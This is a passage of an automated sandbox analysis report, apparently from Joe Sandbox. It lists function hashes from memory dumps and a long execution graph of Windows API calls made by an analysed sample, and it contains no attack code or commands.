                                                                                          • Instruction Fuzzy Hash: D541E693A1FA87CFE39A5378486927865C2EF86299758C4B9D44EC31E2DD1CAC094381
                                                                                          Function 00007FFAAB0E33B5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2034959309.00007FFAAB0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab0e0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                                                          • Instruction ID: b58b18e598536083be5dec6ecc9c5fb48ee31a40dc7e52434904c69ea96cb0db
                                                                                          • Opcode Fuzzy Hash: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                                                          • Instruction Fuzzy Hash: 9101677111CB0C8FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3661DB36E892CB45

                                                                                          Non-executed Functions

                                                                                          Function 00007FFAAB0E0665 Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2034959309.00007FFAAB0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab0e0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (0$8,$P/$^$/
                                                                                          • API String ID: 0-804865107
                                                                                          • Opcode ID: 98a7cc4ce7cb4f85eeaa41e3eabf15ae501ed0fc8d946443368ee46f58483401
                                                                                          • Instruction ID: 94bf0c4edadf0afb20477c805a887d4e6a7daf8bb2c0e16f19bd316fe709c964
                                                                                          • Opcode Fuzzy Hash: 98a7cc4ce7cb4f85eeaa41e3eabf15ae501ed0fc8d946443368ee46f58483401
                                                                                          • Instruction Fuzzy Hash: 9721964290F6C14FF32597A87C1A2555F91DB93390B0884FFD0C80A4EBAA099D5983D5
                                                                                          Function 00007FFAAB0E02AD Relevance: 5.2, Strings: 4, Instructions: 218COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2034959309.00007FFAAB0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab0e0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @J$^$p@!$x.
                                                                                          • API String ID: 0-3683105300
                                                                                          • Opcode ID: 226b7df1e7c897c1f65d4339ec86ee6bc181bcccf57af86c70b51d4f29cc0849
                                                                                          • Instruction ID: 666db61f45606b98776d64121b37d1fb9190c20344b9f338cff1ef2346e85ea6
                                                                                          • Opcode Fuzzy Hash: 226b7df1e7c897c1f65d4339ec86ee6bc181bcccf57af86c70b51d4f29cc0849
                                                                                          • Instruction Fuzzy Hash: 3761B2C390FBC14BE36647A87C061786E94FBA2790B5880FBE0CC4A5EBB9559D1D43C5

                                                                                          Execution Graph

                                                                                          Execution Coverage:3.9%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:89
                                                                                          execution_graph 98166 a34d83 98167 a34dba 98166->98167 98168 a34e37 98167->98168 98169 a34dd8 98167->98169 98203 a34e35 98167->98203 98173 a709c2 98168->98173 98174 a34e3d 98168->98174 98170 a34de5 98169->98170 98171 a34ead PostQuitMessage 98169->98171 98175 a70a35 98170->98175 98176 a34df0 98170->98176 98208 a34e28 98171->98208 98172 a34e1a DefWindowProcW 98172->98208 98225 a2c460 10 API calls Mailbox 98173->98225 98178 a34e42 98174->98178 98179 a34e65 SetTimer RegisterWindowMessageW 98174->98179 98239 a82cce 97 API calls _memset 98175->98239 98180 a34eb7 98176->98180 98181 a34df8 98176->98181 98185 a70965 98178->98185 98186 a34e49 KillTimer 98178->98186 98182 a34e8e CreatePopupMenu 98179->98182 98179->98208 98211 a35b29 98180->98211 98187 a34e03 98181->98187 98188 a70a1a 98181->98188 98182->98208 98184 a709e9 98226 a2c483 291 API calls Mailbox 98184->98226 98192 a7099e MoveWindow 98185->98192 98193 a7096a 98185->98193 98218 a35ac3 98186->98218 98195 a34e9b 98187->98195 98205 a34e0e 98187->98205 98188->98172 98238 a78854 59 API calls Mailbox 98188->98238 98189 a70a47 98189->98172 98189->98208 98192->98208 98196 a7096e 98193->98196 98197 a7098d SetFocus 98193->98197 98223 a35bd7 107 API calls _memset 98195->98223 98201 a70977 98196->98201 98196->98205 98197->98208 98224 a2c460 10 API calls Mailbox 98201->98224 98203->98172 98204 a34eab 98204->98208 98205->98172 98207 a35ac3 Shell_NotifyIconW 98205->98207 98209 a70a0e 98207->98209 98227 a359d3 98209->98227 98212 a35bc2 98211->98212 98213 a35b40 _memset 98211->98213 98212->98208 98240 a356f8 98213->98240 98215 a35bab KillTimer SetTimer 98215->98212 98216 a35b67 98216->98215 98217 a70d6e Shell_NotifyIconW 98216->98217 98217->98215 98219 a34e5c 98218->98219 98220 a35ad5 _memset 98218->98220 98222 a234e4 DeleteObject DestroyWindow Mailbox 98219->98222 98221 a35af4 Shell_NotifyIconW 98220->98221 98221->98219 98222->98208 98223->98204 98224->98208 98225->98184 98226->98205 98228 a359fe _memset 98227->98228 98380 a35800 98228->98380 98232 a35ab9 Shell_NotifyIconW 98235 a35aab 98232->98235 98233 a35a9d Shell_NotifyIconW 98233->98235 98234 a35a83 98234->98232 98234->98233 98236 a356f8 87 API calls 98235->98236 98237 a35ab2 98236->98237 98237->98203 98238->98203 98239->98189 98241 a35715 98240->98241 98261 a357fa Mailbox 98240->98261 98270 a3162d 98241->98270 98244 a35730 98275 a31821 98244->98275 98245 a70c4c LoadStringW 98248 a70c66 98245->98248 98247 a35745 98249 a35752 98247->98249 98255 a70c74 98247->98255 98300 a31c9c 98248->98300 98249->98248 98251 a35760 98249->98251 98284 a31900 98251->98284 98256 a70cb7 Mailbox 98255->98256 98257 a35778 _memset _wcscpy 98255->98257 98304 a31207 98255->98304 98310 a438c8 83 API calls 3 library calls 98256->98310 98259 a357e0 Shell_NotifyIconW 98257->98259 98259->98261 98261->98216 98264 a70ca9 98266 a317e0 59 API calls 98264->98266 98265 a70cd6 98267 a31900 59 API calls 98265->98267 98266->98256 98268 a70ce7 98267->98268 98269 a31900 59 API calls 98268->98269 98269->98257 98311 a40fe6 98270->98311 98272 a31652 98273 a40fe6 Mailbox 59 API calls 98272->98273 98274 a31660 98273->98274 98274->98244 98274->98245 98276 a3189a 98275->98276 98277 a3182d __NMSG_WRITE 98275->98277 98356 a31981 98276->98356 98279 a31843 98277->98279 98280 a31868 98277->98280 98349 a31b7c 98279->98349 98353 a31c7e 98280->98353 98283 a3184b _memmove 98283->98247 98285 a6f534 98284->98285 98286 a31914 98284->98286 98288 a31c7e 59 API calls 98285->98288 98364 a318a5 98286->98364 98290 a6f53f __NMSG_WRITE _memmove 98288->98290 98289 a3191f 98291 a317e0 98289->98291 98292 a317f2 98291->98292 98293 a6f401 98291->98293 98369 a31680 98292->98369 98375 a787f9 59 API calls _memmove 98293->98375 98296 a317fe 98296->98257 98297 a6f40b 98298 a31c9c 59 API calls 98297->98298 98299 a6f413 Mailbox 98298->98299 98301 a31ca7 98300->98301 98302 a31caf 98300->98302 98376 a31bcc 98301->98376 98302->98257 98305 a40fe6 Mailbox 59 API calls 98304->98305 98306 a31228 98305->98306 98307 a40fe6 Mailbox 59 API calls 98306->98307 98308 a31236 98307->98308 98309 a80252 60 API calls Mailbox 98308->98309 98309->98264 98310->98265 98313 a40fee 98311->98313 98314 a41008 98313->98314 98316 a4100c std::exception::exception 98313->98316 98321 a4593c 98313->98321 98338 a435d1 DecodePointer 98313->98338 98314->98272 98339 a487cb RaiseException 98316->98339 98318 a41036 98340 a48701 58 API calls _free 98318->98340 98320 a41048 98320->98272 98322 a459b7 98321->98322 98327 a45948 98321->98327 98347 a435d1 DecodePointer 98322->98347 98324 a459bd 98348 a48d58 58 API calls __getptd_noexit 98324->98348 98325 a45953 98325->98327 98341 a4a39b 58 API calls 2 library calls 98325->98341 98342 a4a3f8 58 API calls 6 library calls 98325->98342 98343 a432cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98325->98343 98327->98325 98329 a4597b RtlAllocateHeap 98327->98329 98332 a459a3 98327->98332 98336 a459a1 98327->98336 98344 a435d1 DecodePointer 98327->98344 98329->98327 98330 a459af 98329->98330 98330->98313 98345 a48d58 58 API calls __getptd_noexit 98332->98345 98346 a48d58 58 API calls __getptd_noexit 98336->98346 98338->98313 98339->98318 98340->98320 98341->98325 98342->98325 98344->98327 98345->98336 98346->98330 98347->98324 98348->98330 98350 a31b94 98349->98350 98352 a31b8e 98349->98352 98351 a40fe6 Mailbox 59 API calls 98350->98351 98351->98352 98352->98283 98354 a40fe6 Mailbox 59 API calls 98353->98354 98355 a31c88 98354->98355 98355->98283 98357 a3198f 98356->98357 98359 a31998 _memmove 98356->98359 98357->98359 98360 a31aa4 98357->98360 98359->98283 98361 a31ab7 98360->98361 98363 a31ab4 _memmove 98360->98363 98362 a40fe6 Mailbox 59 API calls 98361->98362 98362->98363 98363->98359 98365 a318b4 __NMSG_WRITE 98364->98365 98366 a318c5 _memmove 98365->98366 98367 a31c7e 59 API calls 98365->98367 98366->98289 98368 a6f4f1 _memmove 98367->98368 98370 a31692 98369->98370 98373 a316ba _memmove 98369->98373 98371 a40fe6 Mailbox 59 API calls 98370->98371 98370->98373 98374 a3176f _memmove 98371->98374 98372 a40fe6 Mailbox 59 API calls 98372->98374 98373->98296 98374->98372 98375->98297 98377 a31bef _memmove 98376->98377 98378 a31bdc 98376->98378 98377->98302 98378->98377 98379 a40fe6 Mailbox 59 API calls 98378->98379 98379->98377 98381 a35810 98380->98381 98382 a3581c 98380->98382 98381->98234 98384 a834dd 62 API calls _W_store_winword 98381->98384 98382->98381 98383 a35821 DestroyIcon 98382->98383 98383->98381 98384->98234 98385 a26981 98392 a2373a 98385->98392 98387 a26997 98401 a27b3f 98387->98401 98389 a269bf 98391 a2584d 98389->98391 98413 a8a48d 89 API calls 4 library calls 98389->98413 98393 a23746 98392->98393 98394 a23758 98392->98394 98414 a2523c 59 API calls 98393->98414 98396 a23787 98394->98396 98397 a2375e 98394->98397 98415 a2523c 59 API calls 98396->98415 98398 a40fe6 Mailbox 59 API calls 98397->98398 98400 a23750 98398->98400 98400->98387 98402 a3162d 59 API calls 98401->98402 98403 a27b64 _wcscmp 98402->98403 98406 a27b98 Mailbox 98403->98406 98416 a31a36 98403->98416 98406->98389 98407 a317e0 59 API calls 98408 a5ffb8 98407->98408 98420 a23938 68 API calls 98408->98420 98410 a5ffc9 98412 a5ffcd Mailbox 98410->98412 98421 a2523c 59 API calls 98410->98421 98412->98389 98413->98391 98414->98400 98415->98400 98417 a31a45 __NMSG_WRITE _memmove 98416->98417 98418 a40fe6 Mailbox 59 API calls 98417->98418 98419 a31a83 98418->98419 98419->98407 98420->98410 98421->98412 98422 a21066 98427 a2aaaa 98422->98427 98424 a2106c 98460 a42f70 98424->98460 98428 a2aacb 98427->98428 98463 a402eb 98428->98463 98432 a2ab12 98433 a31207 59 API calls 98432->98433 98434 a2ab1c 98433->98434 98435 a31207 59 API calls 98434->98435 98436 a2ab26 98435->98436 98437 a31207 59 API calls 98436->98437 98438 a2ab30 98437->98438 98439 a31207 59 API calls 98438->98439 98440 a2ab6e 98439->98440 98441 a31207 59 API calls 98440->98441 98442 a2ac39 98441->98442 98473 a40588 98442->98473 98446 a2ac6b 98447 a31207 59 API calls 98446->98447 98448 a2ac75 98447->98448 98501 a3fe2b 98448->98501 98450 a2acbc 98451 a2accc GetStdHandle 98450->98451 98452 a2ad18 98451->98452 98453 a62f39 98451->98453 98454 a2ad20 OleInitialize 98452->98454 98453->98452 98455 a62f42 98453->98455 98454->98424 98508 a870f3 64 API calls Mailbox 98455->98508 98457 a62f49 98509 a877c2 CreateThread 98457->98509 98459 a62f55 CloseHandle 98459->98454 98522 a42e74 98460->98522 98462 a21076 98510 a403c4 98463->98510 98466 a403c4 59 API calls 98467 a4032d 98466->98467 98468 a31207 59 API calls 98467->98468 98469 a40339 98468->98469 98470 a31821 59 API calls 98469->98470 98471 a2aad1 98470->98471 98472 a407bb 6 API calls 98471->98472 98472->98432 98474 a31207 59 API calls 98473->98474 98475 a40598 98474->98475 98476 a31207 59 API calls 98475->98476 98477 a405a0 98476->98477 98517 a310c3 98477->98517 98480 a310c3 59 API calls 98481 a405b0 98480->98481 98482 a31207 59 API calls 98481->98482 98483 a405bb 98482->98483 98484 a40fe6 Mailbox 59 API calls 98483->98484 98485 a2ac43 98484->98485 98486 a3ff4c 98485->98486 98487 a3ff5a 98486->98487 98488 a31207 59 API calls 98487->98488 98489 a3ff65 98488->98489 98490 a31207 59 API calls 98489->98490 98491 a3ff70 98490->98491 98492 a31207 59 API calls 98491->98492 98493 a3ff7b 98492->98493 98494 a31207 59 API calls 98493->98494 98495 a3ff86 98494->98495 98496 a310c3 59 API calls 98495->98496 98497 a3ff91 98496->98497 98498 a40fe6 Mailbox 59 API calls 98497->98498 98499 a3ff98 RegisterWindowMessageW 98498->98499 98499->98446 98502 a3fe3b 98501->98502 98503 a7620c 98501->98503 98504 a40fe6 Mailbox 59 API calls 98502->98504 98520 a8a12a 59 API calls 98503->98520 98507 a3fe43 98504->98507 98506 a76217 98507->98450 98508->98457 98509->98459 98521 a877a8 65 API calls 98509->98521 98511 a31207 59 API calls 98510->98511 98512 a403cf 98511->98512 98513 a31207 59 API calls 98512->98513 98514 a403d7 98513->98514 98515 a31207 59 API calls 98514->98515 98516 a40323 98515->98516 98516->98466 98518 a31207 59 API calls 98517->98518 98519 a310cb 98518->98519 98519->98480 98520->98506 98523 a42e80 __alloc_osfhnd 98522->98523 98530 a43447 98523->98530 98529 a42ea7 __alloc_osfhnd 98529->98462 98547 a49e3b 98530->98547 98532 a42e89 98533 a42eb8 DecodePointer DecodePointer 98532->98533 98534 a42ee5 98533->98534 98535 a42e95 98533->98535 98534->98535 98593 a489d4 59 API calls __cftof2_l 98534->98593 98544 a42eb2 98535->98544 98537 a42f48 EncodePointer EncodePointer 98537->98535 98538 a42ef7 98538->98537 98539 a42f1c 98538->98539 98594 a48a94 61 API calls 2 library calls 98538->98594 98539->98535 98542 a42f36 EncodePointer 98539->98542 98595 a48a94 61 API calls 2 library calls 98539->98595 98542->98537 98543 a42f30 98543->98535 98543->98542 98596 a43450 98544->98596 98548 a49e4c 98547->98548 98549 a49e5f EnterCriticalSection 98547->98549 98554 a49ec3 98548->98554 98549->98532 98551 a49e52 98551->98549 98578 a432e5 58 API calls 3 library calls 98551->98578 98555 a49ecf __alloc_osfhnd 98554->98555 98556 a49ef0 98555->98556 98557 a49ed8 98555->98557 98569 a49f11 __alloc_osfhnd 98556->98569 98582 a48a4d 58 API calls 2 library calls 98556->98582 98579 a4a39b 58 API calls 2 library calls 98557->98579 98559 a49edd 98580 a4a3f8 58 API calls 6 library calls 98559->98580 98562 a49f05 98564 a49f0c 98562->98564 98565 a49f1b 98562->98565 98563 a49ee4 98581 a432cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98563->98581 98583 a48d58 58 API calls __getptd_noexit 98564->98583 98566 a49e3b __lock 58 API calls 98565->98566 98570 a49f22 98566->98570 98569->98551 98572 a49f47 98570->98572 98573 a49f2f 98570->98573 98585 a42f85 98572->98585 98584 a4a05b InitializeCriticalSectionAndSpinCount 98573->98584 98576 a49f3b 98591 a49f63 LeaveCriticalSection _doexit 98576->98591 98579->98559 98580->98563 98582->98562 98583->98569 98584->98576 98586 a42f8e RtlFreeHeap 98585->98586 98587 a42fb7 __dosmaperr 98585->98587 98586->98587 98588 a42fa3 98586->98588 98587->98576 98592 a48d58 58 API calls __getptd_noexit 98588->98592 98590 a42fa9 GetLastError 98590->98587 98591->98569 98592->98590 98593->98538 98594->98539 98595->98543 98599 a49fa5 LeaveCriticalSection 98596->98599 98598 a42eb7 98598->98529 98599->98598 100798 a21016 100803 a35ce7 100798->100803 100801 a42f70 __cinit 67 API calls 100802 a21025 100801->100802 100804 a40fe6 Mailbox 59 API calls 100803->100804 100805 a35cef 100804->100805 100806 a2101b 100805->100806 100810 a35f39 100805->100810 100806->100801 100811 a35f42 100810->100811 100812 a35cfb 100810->100812 100813 a42f70 __cinit 67 API calls 100811->100813 100814 a35d13 100812->100814 100813->100812 100815 a31207 59 API calls 100814->100815 100816 a35d2b GetVersionExW 100815->100816 100817 a31821 59 API calls 100816->100817 100818 a35d6e 100817->100818 100819 a31981 59 API calls 100818->100819 100828 a35d9b 100818->100828 100820 a35d8f 100819->100820 100821 a3133d 59 API calls 100820->100821 100821->100828 100822 a35e00 GetCurrentProcess IsWow64Process 100823 a35e19 100822->100823 100825 a35e98 GetSystemInfo 100823->100825 100826 a35e2f 100823->100826 100824 a71098 100827 a35e65 100825->100827 100838 a355f0 100826->100838 100827->100806 100828->100822 100828->100824 100831 a35e41 100834 a355f0 2 API calls 100831->100834 100832 a35e8c GetSystemInfo 100833 a35e56 100832->100833 100833->100827 100836 a35e5c FreeLibrary 100833->100836 100835 a35e49 GetNativeSystemInfo 100834->100835 100835->100833 100836->100827 100839 a35619 100838->100839 100840 a355f9 LoadLibraryA 100838->100840 100839->100831 100839->100832 100840->100839 100841 a3560a GetProcAddress 100840->100841 100841->100839 98600 a5e463 98601 a2373a 59 API calls 98600->98601 98602 a5e479 98601->98602 98603 a5e48f 98602->98603 98604 a5e4fa 98602->98604 98654 a25376 60 API calls 98603->98654 98612 a2b020 98604->98612 98606 a5e4ce 98611 a5e4ee Mailbox 98606->98611 98655 a8890a 59 API calls Mailbox 98606->98655 98609 a5f046 Mailbox 98611->98609 98656 a8a48d 89 API calls 4 library calls 98611->98656 98657 a33740 98612->98657 98615 a630b6 98756 a8a48d 89 API calls 4 library calls 98615->98756 98617 a2b07f 98617->98615 98618 a630d4 98617->98618 98636 a2bb86 98617->98636 98637 a2b132 Mailbox _memmove 98617->98637 98757 a8a48d 89 API calls 4 library calls 98618->98757 98620 a6355e 98634 a2b4dd 98620->98634 98800 a8a48d 89 API calls 4 library calls 98620->98800 98621 a6318a 98621->98634 98759 a8a48d 89 API calls 4 library calls 98621->98759 98626 a63106 98626->98621 98758 a2a9de 291 API calls 98626->98758 98629 a253b0 291 API calls 98629->98637 98630 a40fe6 59 API calls Mailbox 98630->98637 98631 a7730a 59 API calls 98631->98637 98632 a23b31 59 API calls 98632->98637 98634->98611 98755 a8a48d 89 API calls 4 library calls 98636->98755 98637->98620 98637->98626 98637->98629 98637->98630 98637->98631 98637->98632 98637->98634 98637->98636 98638 a63418 98637->98638 98645 a631c3 98637->98645 98646 a23c30 68 API calls 98637->98646 98647 a6346f 98637->98647 98651 a31c9c 59 API calls 98637->98651 98652 a2523c 59 API calls 98637->98652 98662 a23add 98637->98662 98669 a2bc70 98637->98669 98749 a23a40 59 API calls Mailbox 98637->98749 98750 a25190 98637->98750 98761 a76c62 59 API calls 2 library calls 98637->98761 98762 a9a9c3 85 API calls Mailbox 98637->98762 98763 a76c1e 59 API calls Mailbox 98637->98763 98764 a85ef2 68 API calls 98637->98764 98765 a23ea3 68 API calls Mailbox 98637->98765 98799 a8a12a 59 API calls 98637->98799 98766 a253b0 98638->98766 98640 a63448 98640->98634 98794 a239be 98640->98794 98760 a8a48d 89 API calls 4 library calls 98645->98760 98646->98637 98798 a8a48d 89 API calls 4 library calls 98647->98798 98651->98637 98652->98637 98654->98606 98655->98611 98656->98609 98658 a3374f 98657->98658 98661 a3376a 98657->98661 98659 a31aa4 59 API calls 98658->98659 98660 a33757 CharUpperBuffW 98659->98660 98660->98661 98661->98617 98663 a5d3cd 98662->98663 98664 a23aee 98662->98664 98665 a40fe6 Mailbox 59 API calls 98664->98665 98666 a23af5 98665->98666 98667 a23b16 98666->98667 98801 a23ba5 59 API calls Mailbox 98666->98801 98667->98637 98670 a6359f 98669->98670 98682 a2bc95 98669->98682 98905 a8a48d 89 API calls 4 library calls 98670->98905 98672 a2bf3b 98672->98637 98676 a2c2b6 98676->98672 98677 a2c2c3 98676->98677 98903 a2c483 291 API calls Mailbox 98677->98903 98678 a2bf25 Mailbox 98678->98672 98902 a2c460 10 API calls Mailbox 98678->98902 98681 a2c2ca LockWindowUpdate DestroyWindow GetMessageW 98681->98672 98683 a2c2fc 98681->98683 98702 a2bca5 Mailbox 98682->98702 98906 a25376 60 API calls 98682->98906 98907 a7700c 291 API calls 98682->98907 98685 a64509 TranslateMessage DispatchMessageW GetMessageW 98683->98685 98684 a636b3 Sleep 98684->98702 98685->98685 98686 a64539 98685->98686 98686->98672 98687 a6405d WaitForSingleObject 98691 a6407d GetExitCodeProcess CloseHandle 98687->98691 98687->98702 98688 a2bf54 timeGetTime 98688->98702 98690 a2c210 Sleep 98705 a2c1fa Mailbox 98690->98705 98700 a2c36b 98691->98700 98692 a31c9c 59 API calls 98692->98702 98693 a31207 59 API calls 98693->98705 98694 a643a9 Sleep 98694->98705 98695 a40fe6 59 API calls Mailbox 98695->98702 98697 a4083e timeGetTime 98697->98705 98698 a26cd8 269 API calls 98698->98702 98700->98637 98701 a2c324 timeGetTime 98904 a25376 60 API calls 98701->98904 98702->98678 98702->98684 98702->98687 98702->98688 98702->98690 98702->98692 98702->98694 98702->98695 98702->98698 98702->98700 98702->98701 98702->98705 98711 a26d79 109 API calls 98702->98711 98714 a25376 60 API calls 98702->98714 98723 a2c26d 98702->98723 98724 a2b020 269 API calls 98702->98724 98728 a8a48d 89 API calls 98702->98728 98731 a31a36 59 API calls 98702->98731 98732 a25190 59 API calls Mailbox 98702->98732 98734 a23ea3 68 API calls 98702->98734 98735 a253b0 269 API calls 98702->98735 98737 a239be 68 API calls 98702->98737 98738 a76cf1 59 API calls Mailbox 98702->98738 98739 a63e13 VariantClear 98702->98739 98740 a241c4 59 API calls Mailbox 98702->98740 98741 a63ea9 VariantClear 98702->98741 98742 a63c57 VariantClear 98702->98742 98743 a77aad 59 API calls 98702->98743 98802 a252b0 98702->98802 98811 a29a00 98702->98811 98818 a29c80 98702->98818 98849 a2a820 98702->98849 98866 a8e4a0 98702->98866 98869 a8c270 98702->98869 98876 a342cf 98702->98876 98880 a2cfd7 98702->98880 98899 a9e60c 98702->98899 98908 aa6655 59 API calls 98702->98908 98909 a8a058 59 API calls Mailbox 98702->98909 98910 a7e0aa 59 API calls 98702->98910 98911 a24d37 98702->98911 98929 a76c62 59 API calls 2 library calls 98702->98929 98930 a238ff 59 API calls 98702->98930 98931 a23a40 59 API calls Mailbox 98702->98931 98936 a9c355 291 API calls Mailbox 98702->98936 98705->98690 98705->98693 98705->98697 98705->98700 98705->98702 98707 a64440 GetExitCodeProcess 98705->98707 98708 aa6562 110 API calls 98705->98708 98715 a638aa Sleep 98705->98715 98716 a644c8 Sleep 98705->98716 98717 a31a36 59 API calls 98705->98717 98932 a82baf 60 API calls 98705->98932 98933 a25376 60 API calls 98705->98933 98934 a23ea3 68 API calls Mailbox 98705->98934 98935 a26cd8 291 API calls 98705->98935 98937 a770e2 59 API calls 98705->98937 98938 a857ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98705->98938 98939 a84148 CreateToolhelp32Snapshot Process32FirstW 98705->98939 98712 a64456 WaitForSingleObject 98707->98712 98713 a6446c CloseHandle 98707->98713 98708->98705 98711->98702 98712->98702 98712->98713 98713->98705 98714->98702 98715->98702 98716->98702 98717->98705 98726 a31a36 59 API calls 98723->98726 98724->98702 98726->98678 98728->98702 98731->98702 98732->98702 98734->98702 98735->98702 98737->98702 98738->98702 98739->98702 98740->98702 98741->98702 98742->98702 98743->98702 98749->98637 98752 a2519b 98750->98752 98751 a251d2 98751->98637 98752->98751 99470 a241c4 59 API calls Mailbox 98752->99470 98754 a251fd 98754->98637 98755->98615 98756->98634 98757->98634 98758->98621 98759->98634 98760->98634 98761->98637 98762->98637 98763->98637 98764->98637 98765->98637 98767 a253cf 98766->98767 98788 a253fd Mailbox 98766->98788 98768 a40fe6 Mailbox 59 API calls 98767->98768 98768->98788 98769 a42f70 67 API calls __cinit 98769->98788 98770 a269fa 98771 a31c9c 59 API calls 98770->98771 98780 a25569 Mailbox 98771->98780 98772 a269ff 98774 a5f165 98772->98774 98775 a5e691 98772->98775 98773 a40fe6 59 API calls Mailbox 98773->98788 99477 a8a48d 89 API calls 4 library calls 98774->99477 99473 a8a48d 89 API calls 4 library calls 98775->99473 98776 a31207 59 API calls 98776->98788 98780->98640 98781 a5e6a0 98781->98640 98782 a5ea9a 98784 a31c9c 59 API calls 98782->98784 98784->98780 98785 a31c9c 59 API calls 98785->98788 98787 a77aad 59 API calls 98787->98788 98788->98769 98788->98770 98788->98772 98788->98773 98788->98775 98788->98776 98788->98780 98788->98782 98788->98785 98788->98787 98789 a5eb67 98788->98789 98791 a5ef28 98788->98791 98793 a25a1a 98788->98793 99471 a27e50 291 API calls 2 library calls 98788->99471 99472 a26e30 60 API calls Mailbox 98788->99472 98789->98780 99474 a77aad 59 API calls 98789->99474 99475 a8a48d 89 API calls 4 library calls 98791->99475 99476 a8a48d 89 API calls 4 library calls 98793->99476 98795 a239c9 98794->98795 98797 a239f0 98795->98797 99478 a23ea3 68 API calls Mailbox 98795->99478 98797->98647 98798->98634 98799->98637 98800->98634 98801->98667 98803 a252c6 98802->98803 98805 a25313 98802->98805 98804 a252d3 PeekMessageW 98803->98804 98803->98805 98804->98805 98806 a252ec 98804->98806 98805->98806 98808 a5df68 TranslateAcceleratorW 98805->98808 98809 a25352 TranslateMessage DispatchMessageW 98805->98809 98810 a2533e PeekMessageW 98805->98810 98949 a2359e 98805->98949 98806->98702 98808->98805 98808->98810 98809->98810 98810->98805 98810->98806 98812 a29a31 98811->98812 98813 a29a1d 98811->98813 98988 a8a48d 89 API calls 4 library calls 98812->98988 98954 a294e0 98813->98954 98816 a29a28 98816->98702 98817 a62478 98817->98817 98819 a29cb5 98818->98819 98820 a6247d 98819->98820 98823 a29d1f 98819->98823 98831 a29d79 98819->98831 98821 a253b0 291 API calls 98820->98821 98822 a62492 98821->98822 98847 a29f50 Mailbox 98822->98847 98996 a8a48d 89 API calls 4 library calls 98822->98996 98826 a31207 59 API calls 98823->98826 98823->98831 98824 a31207 59 API calls 98824->98831 98828 a624d8 98826->98828 98827 a42f70 __cinit 67 API calls 98827->98831 98830 a42f70 __cinit 67 API calls 98828->98830 98829 a624fa 98829->98702 98830->98831 98831->98824 98831->98827 98831->98829 98834 a29f3a 98831->98834 98831->98847 98832 a239be 68 API calls 98832->98847 98834->98847 98997 a8a48d 89 API calls 4 library calls 98834->98997 98835 a2a775 99001 a8a48d 89 API calls 4 library calls 98835->99001 98838 a25190 Mailbox 59 API calls 98838->98847 98839 a253b0 291 API calls 98839->98847 98840 a627f9 98840->98702 98841 a24230 59 API calls 98841->98847 98844 a8a48d 89 API calls 98844->98847 98845 a31bcc 59 API calls 98845->98847 98847->98832 98847->98835 98847->98838 98847->98839 98847->98841 98847->98844 98847->98845 98848 a2a058 98847->98848 98998 a77aad 59 API calls 98847->98998 98999 a9ccac 291 API calls 98847->98999 99000 a9bc26 291 API calls Mailbox 98847->99000 99002 a99ab0 291 API calls Mailbox 98847->99002 98848->98702 98850 a62d51 98849->98850 98853 a2a84c 98849->98853 99004 a8a48d 89 API calls 4 library calls 98850->99004 98852 a62d62 98852->98702 98854 a62d6a 98853->98854 98862 a2a888 _memmove 98853->98862 99005 a8a48d 89 API calls 4 library calls 98854->99005 98857 a40fe6 59 API calls Mailbox 98857->98862 98858 a62dae 99006 a2a9de 291 API calls 98858->99006 98859 a253b0 291 API calls 98859->98862 98861 a62dc8 98863 a2a975 98861->98863 99007 a8a48d 89 API calls 4 library calls 98861->99007 98862->98857 98862->98858 98862->98859 98862->98861 98862->98863 98864 a2a962 98862->98864 98863->98702 98864->98863 99003 a9a9c3 85 API calls Mailbox 98864->99003 99008 a8f87d 98866->99008 98868 a8e4b0 98868->98702 98870 a24d37 84 API calls 98869->98870 98871 a8c286 98870->98871 99208 a84005 98871->99208 98873 a8c28e 98874 a8c292 GetLastError 98873->98874 98875 a8c2a7 98873->98875 98874->98875 98875->98702 98877 a342d9 98876->98877 98878 a342e8 98876->98878 98877->98702 98878->98877 98879 a342ed CloseHandle 98878->98879 98879->98877 98881 a24d37 84 API calls 98880->98881 98882 a2d001 98881->98882 99323 a25278 98882->99323 98884 a2d018 98885 a2d57b 98884->98885 98894 a2d439 Mailbox __NMSG_WRITE 98884->98894 99338 a2502b 59 API calls 98884->99338 98885->98702 98888 a3162d 59 API calls 98888->98894 98889 a24f98 59 API calls 98889->98894 98890 a40c65 62 API calls 98890->98894 98893 a24d37 84 API calls 98893->98894 98894->98885 98894->98888 98894->98889 98894->98890 98894->98893 98895 a31821 59 API calls 98894->98895 98896 a359d3 94 API calls 98894->98896 98897 a35ac3 Shell_NotifyIconW 98894->98897 98898 a2502b 59 API calls 98894->98898 99328 a4312d 98894->99328 99339 a3153b 59 API calls 2 library calls 98894->99339 99340 a24f3c 98894->99340 98895->98894 98896->98894 98897->98894 98898->98894 99349 a9d1c6 98899->99349 98901 a9e61c 